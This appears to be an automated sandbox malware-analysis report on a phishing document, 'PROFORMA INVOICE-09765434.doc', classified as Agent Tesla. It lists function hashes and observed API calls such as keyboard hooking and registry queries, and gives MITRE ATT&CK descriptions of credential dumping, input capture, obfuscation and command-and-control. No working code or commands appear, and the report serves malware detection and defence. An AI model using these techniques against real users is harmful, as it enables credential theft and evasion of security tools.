Instruction ID: e47687cb87dd72b7ae0fc10f2c25c9e0f3fbaaaf91c12201b55ffddab9938266
Opcode Fuzzy Hash: d8ab1c5d42db2b010bd5c49bc8d6177ca8ece902300febc72c721a048c9ad555
Instruction Fuzzy Hash: B9818E74E406258FCB25DF20C99479EB3BAAF84308F2088A9D609E7741DF349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BA1BE, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003BA1E5

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3172a5f20b09c9fc97636013b5fdf5a3885df47be5b4c115bf17e42635b3398d
Instruction ID: e6a328c4d72c8fb3c41ded4084f10e724490482e96301aa4f4a3ef60e0a7a8ef
Opcode Fuzzy Hash: 3172a5f20b09c9fc97636013b5fdf5a3885df47be5b4c115bf17e42635b3398d
Instruction Fuzzy Hash: 84818E74E406258FCB25DF24C99479EB7BAAF88309F2088A9D609E7741DF349E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003BD2E8, Relevance: 1.6, APIs: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 003BD401

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0480ac56e4c064c5d0cb0d6ad63230f1e2906bac3680394092da41c7732798d3
Instruction ID: fea9bc7044b93beedfb9b017ef8d4d63bfe956d6e72179ae748c67041b6359f7
Opcode Fuzzy Hash: 0480ac56e4c064c5d0cb0d6ad63230f1e2906bac3680394092da41c7732798d3
Instruction Fuzzy Hash: 47518E70D053889FCB12CFA9C890ADEBFF5AF49304F59846AE948AB352D7709905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003BBCD8, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 003BD401

Memory Dump Source

Source File: 00000007.00000002.2397935668.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c26f36979d72f1a7d72564a4cee814670b3542bc5d065d555c0198f7950a2042
Instruction ID: 8c7b89f3da11cc65f0ee96d16e510b9398036e3e8f6db82f92a6bc3178fc0fab
Opcode Fuzzy Hash: c26f36979d72f1a7d72564a4cee814670b3542bc5d065d555c0198f7950a2042
Instruction Fuzzy Hash: 4431E1B1D002189BCB10CF9AD884ACEFBF5BF48304F15842AE918AB714D770A905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0218F9C0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0218FA43

Memory Dump Source

Source File: 00000007.00000002.2398415622.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c1533f6b51541c4246334f8a9e83965c0a2c6b06a257359bf92933a9b1b58a3b
Instruction ID: f072df403a6a30f0aec0f97bdc5f6ecb31ef8337580a90a594ed88b1abcb4e24
Opcode Fuzzy Hash: c1533f6b51541c4246334f8a9e83965c0a2c6b06a257359bf92933a9b1b58a3b
Instruction Fuzzy Hash: 14213471D002099FDB14DFA9D884BEEFBF5FB88324F14882AE459A7250C774A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002FD48C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397870939.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2b5dff76ca43c99f956b57f271852adc1d973d06e362452e70bdbd34c36ee8
Instruction ID: 2175f81f690ad4b8aa7ce9f187c78870921a9c2b2b1df24bbe774af07d4943df
Opcode Fuzzy Hash: 2e2b5dff76ca43c99f956b57f271852adc1d973d06e362452e70bdbd34c36ee8
Instruction Fuzzy Hash: C5212575110208DFDB05DF50D9C0B26FFA7FB98368F248579EA050B206C336E866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397881958.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e83f2f27bc6b07d077c3dd8ebaa001c914e150321d7277fdca90ae848c2fe7
Instruction ID: 8d4270debd857acd8b3a4a7b88bedc63220d1f401ff9281c32b4237ada2eaa2b
Opcode Fuzzy Hash: 73e83f2f27bc6b07d077c3dd8ebaa001c914e150321d7277fdca90ae848c2fe7
Instruction Fuzzy Hash: A421F275604204DFDB16CFA4D994B16BBA9FB88314F24C969E80E4B786C336D847CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030E674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397881958.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35ec7d07d685920440425d77bb60d51fb7a5dc19c2d776ac015af949dd97cf74
Instruction ID: 438fff9f5f325904b6dbfd6ac8037c75865f85e79ff5760637e65599f059eb72
Opcode Fuzzy Hash: 35ec7d07d685920440425d77bb60d51fb7a5dc19c2d776ac015af949dd97cf74
Instruction Fuzzy Hash: 53212575700204DFCB06CF60D5D4B26BBA5FB98714F24CDADE8494B682C337E846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 002FD487, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397870939.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: 35c89f38b92f1593b3eb056eb1f67bbfbc3dfb737588650e984f844bcacbce0f
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: BC11D376504244CFCB02CF10D5C4B26FF72FB94314F24C6A9D9090B216C336D866CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0030D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397881958.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction ID: ed006b57571114f0b83c293b8e04d56dd05fdef48877d51511d866511dacbb03
Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction Fuzzy Hash: D7118B75504280DFCB12CF54D994B15BBA1FB85314F24C6AAD8494B696C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0030E66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397881958.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction ID: f22a78ea5110a9fb588f25a1e15d0d19844006410f27eef2dbf3bfc3f561b38f
Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction Fuzzy Hash: 3311DD79604280CFCB02CF14D5D4B15BFA1FB84714F28CAADD8494B692C33AE80ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002FD795, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397870939.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0b8e84ebd2f0f9b0dbe6d9f8303e6149c4a6d38af1b3cce6a34a7b1eb30065
Instruction ID: f451e0bd0c053b1e2626b5a345c4082cc9a6d1ed924228b4fa7f1d4d3565359c
Opcode Fuzzy Hash: 1d0b8e84ebd2f0f9b0dbe6d9f8303e6149c4a6d38af1b3cce6a34a7b1eb30065
Instruction Fuzzy Hash: 9501AC31014348DAD7206F55C988B77FBDDDF51764F148566DA451E286C3749C50C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 002FD794, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2397870939.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c246c3136c4ebb6902e4794364aed80cfe6c51e6ab26862db2868c9d3bf9daf
Instruction ID: c2d3599f5767f5adb741959ad492e3e6fbb4b62bd31a8f30ca155a9aaac99c4b
Opcode Fuzzy Hash: 2c246c3136c4ebb6902e4794364aed80cfe6c51e6ab26862db2868c9d3bf9daf
Instruction Fuzzy Hash: EBF062724042449AEB209E15C888B73FFD8EB91764F28C56AED485F286C3789C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PROFORMA INVOICE-09765434.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

SMTP Packets

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre